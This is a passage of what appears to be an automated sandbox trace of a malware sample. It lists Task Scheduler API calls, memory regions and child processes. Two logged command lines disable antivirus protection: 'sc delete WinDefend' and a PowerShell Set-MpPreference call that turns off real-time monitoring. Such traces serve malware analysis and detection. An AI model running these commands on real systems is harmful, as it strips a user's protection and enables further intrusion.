IUnknown:Release (This=0x126c20) returned 0x0 [0139.273] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126c20) returned 0x0 [0139.275] ITaskFolderCollection:get_Count (in: This=0x126c20, pCount=0x24df08 | out: pCount=0x24df08*=0) returned 0x0 [0139.275] IUnknown:Release (This=0x126c20) returned 0x0 [0139.275] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.275] ITaskFolderCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000003, varVal2=0x449cf8), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x12b5a0) returned 0x0 [0139.275] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126bd0) returned 0x0 [0139.276] IRegisteredTaskCollection:get_Count (in: This=0x126bd0, pCount=0x24def0 | out: pCount=0x24def0*=0) returned 0x0 [0139.276] IUnknown:Release (This=0x126bd0) returned 0x0 [0139.276] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24dd98 | out: ppFolders=0x24dd98*=0x126bd0) returned 0x0 [0139.277] ITaskFolderCollection:get_Count (in: This=0x126bd0, pCount=0x24df08 | out: pCount=0x24df08*=0) returned 0x0 [0139.277] IUnknown:Release (This=0x126bd0) returned 0x0 [0139.277] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.277] IUnknown:Release (This=0x126b00) returned 0x0 [0139.277] IUnknown:Release (This=0x126a50) returned 0x0 [0139.277] TaskScheduler:IUnknown:Release (This=0x125a50) returned 0x0 [0139.277] CoUninitialize () [0139.282] RtlExitUserProcess (ExitCode=0x0) Thread: id = 181 os_tid = 0x224 Process: id = "21" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x42ebb000" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x894" cmd_line = "sc delete WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2747 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2748 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2749 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2750 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2751 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2752 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2753 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2754 start_va = 0xda0000 end_va = 0xdabfff entry_point = 0xda0000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 2755 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2756 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2757 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2758 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2759 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2760 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2761 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2762 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2763 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2764 start_va = 0x410000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2765 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2766 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2767 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2768 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2769 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2770 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2771 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 2772 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2773 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2774 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2775 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2776 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2777 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2778 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2779 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2780 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2781 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2782 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2783 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2784 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2846 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2847 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2848 start_va = 0xf0000 end_va = 0xfffff entry_point = 0xf0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 155 os_tid = 0xad4 [0128.987] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2df94c | out: lpSystemTimeAsFileTime=0x2df94c*(dwLowDateTime=0xef6010d0, dwHighDateTime=0x1d4be3a)) [0128.987] GetCurrentProcessId () returned 0xac4 [0128.987] GetCurrentThreadId () returned 0xad4 [0128.987] GetTickCount () returned 0x2cba7 [0128.987] QueryPerformanceCounter (in: lpPerformanceCount=0x2df944 | out: lpPerformanceCount=0x2df944*=1820635900000) returned 1 [0128.987] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0128.987] __set_app_type (_Type=0x1) [0128.987] __p__fmode () returned 0x75ca31f4 [0128.987] __p__commode () returned 0x75ca31fc [0128.987] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xda79c7) returned 0x0 [0128.988] __wgetmainargs (in: _Argc=0xda9020, _Argv=0xda9028, _Env=0xda9024, _DoWildCard=0, _StartInfo=0xda9034 | out: _Argc=0xda9020, _Argv=0xda9028, _Env=0xda9024) returned 0 [0128.988] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.991] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.991] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0128.991] _wcsicmp (_String1="delete", _String2="query") returned -13 [0128.991] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0128.991] _wcsicmp (_String1="delete", _String2="start") returned -15 [0128.991] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0128.991] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0128.992] _wcsicmp (_String1="delete", _String2="control") returned 1 [0128.992] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0128.992] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0128.992] _wcsicmp (_String1="delete", _String2="config") returned 1 [0128.992] _wcsicmp (_String1="delete", _String2="description") returned -7 [0128.992] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0128.992] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0128.992] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0128.992] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0128.992] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0128.992] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0128.992] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0128.992] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0128.992] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0128.992] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0128.992] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5cf6a0 [0128.995] OpenServiceW (hSCManager=0x5cf6a0, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x5cf600 [0128.995] DeleteService (hService=0x5cf600) returned 1 [0128.997] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x2df878, nSize=0x2, Arguments=0x2df884 | out: lpBuffer="㱸]樂-榳ÚᰐÚ") returned 0x1c [0128.998] GetFileType (hFile=0x7) returned 0x2 [0128.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2df84c | out: lpMode=0x2df84c) returned 1 [0128.999] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5d3c78*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x2df868, lpReserved=0x0 | out: lpBuffer=0x5d3c78*, lpNumberOfCharsWritten=0x2df868*=0x1c) returned 1 [0128.999] LocalFree (hMem=0x5d3c78) returned 0x0 [0128.999] LocalFree (hMem=0x0) returned 0x0 [0128.999] CloseServiceHandle (hSCObject=0x5cf600) returned 1 [0128.999] CloseServiceHandle (hSCObject=0x5cf6a0) returned 1 [0129.050] exit (_Code=0) Thread: id = 158 os_tid = 0xb78 Process: id = "22" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4066a000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x318" cmd_line = "powershell Set-MpPreference -DisableRealtimeMonitoring $true" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2785 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2786 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2787 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2788 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2789 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2790 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2791 start_va = 0x2a0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 2792 start_va = 0x221c0000 end_va = 0x22231fff entry_point = 0x221c0000 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe") Region: id = 2793 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2794 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2795 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2796 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2797 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2798 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2799 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2800 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2801 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2802 start_va = 0x100000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2803 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2804 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2805 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2806 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2807 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2849 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2851 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2852 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2853 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 2854 start_va = 0x74da0000 end_va = 0x74de9fff entry_point = 0x74da0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 2855 start_va = 0x75220000 end_va = 0x75233fff entry_point = 0x75220000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 2856 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2857 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2858 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2859 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2860 start_va = 0x75540000 end_va = 0x755cefff entry_point = 0x75540000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2861 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2862 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2863 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2864 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2865 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2866 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2867 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2868 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2869 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2870 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2871 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2872 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2873 start_va = 0x470000 end_va = 0x5f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2874 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2875 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2876 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2877 start_va = 0xf0000 end_va = 0xf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2878 start_va = 0x180000 end_va = 0x182fff entry_point = 0x180000 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 2879 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2880 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2881 start_va = 0x600000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 2882 start_va = 0x790000 end_va = 0x1b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2883 start_va = 0x1cb0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 2884 start_va = 0x1d10000 end_va = 0x1d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 2885 start_va = 0x1d70000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 2886 start_va = 0x75050000 end_va = 0x750cffff entry_point = 0x75050000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2890 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2891 start_va = 0x1b90000 end_va = 0x1c6efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b90000" filename = "" Region: id = 2892 start_va = 0x764b0000 end_va = 0x76532fff entry_point = 0x764b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2893 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 2894 start_va = 0x74d70000 end_va = 0x74d7afff entry_point = 0x74d70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 2895 start_va = 0x74d80000 end_va = 0x74d96fff entry_point = 0x74d80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2896 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2897 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2898 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2899 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2900 start_va = 0x300000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2901 start_va = 0x1d80000 end_va = 0x204efff entry_point = 0x1d80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2902 start_va = 0x2060000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2903 start_va = 0x74a80000 end_va = 0x74aa0fff entry_point = 0x74a80000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 2904 start_va = 0x74ab0000 end_va = 0x74ba4fff entry_point = 0x74ab0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" 